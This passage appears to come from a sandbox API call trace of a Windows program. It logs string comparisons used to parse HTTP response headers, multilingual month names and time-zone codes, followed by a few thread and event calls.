dwCmpFlags=0x1, lpString1="plain", cchCount1=5, lpString2="xml", cchCount2=3) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="plain", cchCount1=5, lpString2="xml-external-parsed-entity", cchCount2=26) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lain", cchCount1=4, lpString2="+xml", cchCount2=4) returned 3 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Length", cchCount2=14) returned 3 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Length", cchCount2=14) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Length", cchCount2=14) returned 3 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Length", cchCount2=14) returned 3 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Length", cchCount1=14, lpString2="Content-Length", cchCount2=14) returned 2 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Content-Range", cchCount2=13) returned 3 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Content-Range", cchCount2=13) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Content-Range", cchCount2=13) returned 3 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Content-Range", cchCount2=13) returned 3 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Length", cchCount1=14, lpString2="Content-Range", cchCount2=13) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Via", cchCount1=3, lpString2="Content-Range", cchCount2=13) returned 3 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Server", cchCount1=6, lpString2="Date", cchCount2=4) returned 3 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Connection", cchCount1=10, lpString2="Date", cchCount2=4) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Content-Type", cchCount1=12, lpString2="Date", cchCount2=4) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vary", cchCount1=4, lpString2="Date", cchCount2=4) returned 3 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Date", cchCount1=4, lpString2="Date", cchCount2=4) returned 2 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="SUN", cchCount2=3) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mon", cchCount1=3, lpString2="MON", cchCount2=3) returned 2 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JAN", cchCount2=3) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FEB", cchCount2=3) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAR", cchCount2=3) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="APR", cchCount2=3) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAY", cchCount2=3) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUN", cchCount2=3) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUL", cchCount2=3) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AUG", cchCount2=3) returned 1 [0102.578] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEP", cchCount2=3) returned 1 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OCT", cchCount2=3) returned 1 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NOV", cchCount2=3) returned 1 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEC", cchCount2=3) returned 1 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUNE", cchCount2=4) returned 1 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JULY", cchCount2=4) returned 1 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRZ", cchCount2=3) returned 1 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DEZ", cchCount2=3) returned 1 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="ENO", cchCount2=3) returned 1 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FBRO", cchCount2=4) returned 1 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MZO", cchCount2=3) returned 1 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AB", cchCount2=2) returned 1 [0102.579] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AGTO", cchCount2=4) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SBRE", cchCount2=4) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OBRE", cchCount2=4) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="NBRE", cchCount2=4) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DBRE", cchCount2=4) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MRT", cchCount2=3) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MEI", cchCount2=3) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="OKT", cchCount2=3) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JANV", cchCount2=4) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉV", cchCount2=3) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MARS", cchCount2=4) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVR", cchCount2=3) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAI", cchCount2=3) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIN", cchCount2=4) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUIL", cchCount2=4) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛ", cchCount2=3) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="SEPT", cchCount2=4) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="DÉC", cchCount2=3) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="FÉVR", cchCount2=4) returned 1 [0102.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="JUI", cchCount2=3) returned 1 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AOÛT", cchCount2=4) returned 1 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="MAJ", cchCount2=3) returned 1 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="AVG", cchCount2=3) returned 1 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="16", cchCount1=2, lpString2="", cchCount2=0) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="JAN", cchCount2=3) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="FEB", cchCount2=3) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mar", cchCount1=3, lpString2="MAR", cchCount2=3) returned 2 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="A", cchCount2=1) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACDT", cchCount2=4) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACST", cchCount2=4) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ACT", cchCount2=3) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ADT", cchCount2=3) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEDT", cchCount2=4) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AEST", cchCount2=4) returned 3 [0102.581] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AFT", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKDT", cchCount2=4) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AKST", cchCount2=4) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMST", cchCount2=4) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AMT", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ART", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AST", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWDT", cchCount2=4) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AWST", cchCount2=4) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZOST", cchCount2=5) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="AZT", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="B", cchCount2=1) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BDT", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIOT", cchCount2=4) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BIT", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BOT", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BRT", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BST", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="BTT", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="C", cchCount2=1) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CAT", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CCT", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CDT", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEDT", cchCount2=4) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CEST", cchCount2=4) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CET", cchCount2=3) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHADT", cchCount2=5) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHAST", cchCount2=5) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHOT", cchCount2=4) returned 3 [0102.582] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ChST", cchCount2=4) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CHUT", cchCount2=4) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIST", cchCount2=4) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CIT", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CKT", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLST", cchCount2=4) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CLT", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COST", cchCount2=4) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="COT", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CST", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CT", cchCount2=2) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CVT", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CWST", cchCount2=4) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="CXT", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="D", cchCount2=1) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="DAVT", cchCount2=4) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="DDUT", cchCount2=4) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="DFT", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="E", cchCount2=1) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EASST", cchCount2=5) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EAST", cchCount2=4) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EAT", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ECT", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="ECT", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EDT", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EDT", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EEDT", cchCount2=4) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EEST", cchCount2=4) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EET", cchCount2=3) returned 3 [0102.583] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EGST", cchCount2=4) returned 3 [0102.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EGT", cchCount2=3) returned 3 [0102.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EIT", cchCount2=3) returned 3 [0102.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EST", cchCount2=3) returned 3 [0102.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EST", cchCount2=3) returned 3 [0102.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="EST", cchCount2=3) returned 3 [0102.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="F", cchCount2=1) returned 3 [0102.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="FET", cchCount2=3) returned 3 [0102.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="FJT", cchCount2=3) returned 3 [0102.584] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GMT", cchCount1=3, lpString2="FKST", cchCount2=4) returned 3 [0102.584] GetTimeZoneInformation (in: lpTimeZoneInformation=0x19fab4 | out: lpTimeZoneInformation=0x19fab4) returned 0x1 [0102.584] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x3f4 [0102.584] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3f0 [0102.584] GetCurrentThreadId () returned 0x1358 [0102.584] GetCurrentThreadId () returned 0x1358 [0102.584] GetCurrentThreadId () returned 0x1358 [0102.584] select (in: nfds=0, readfds=0x19fa94, 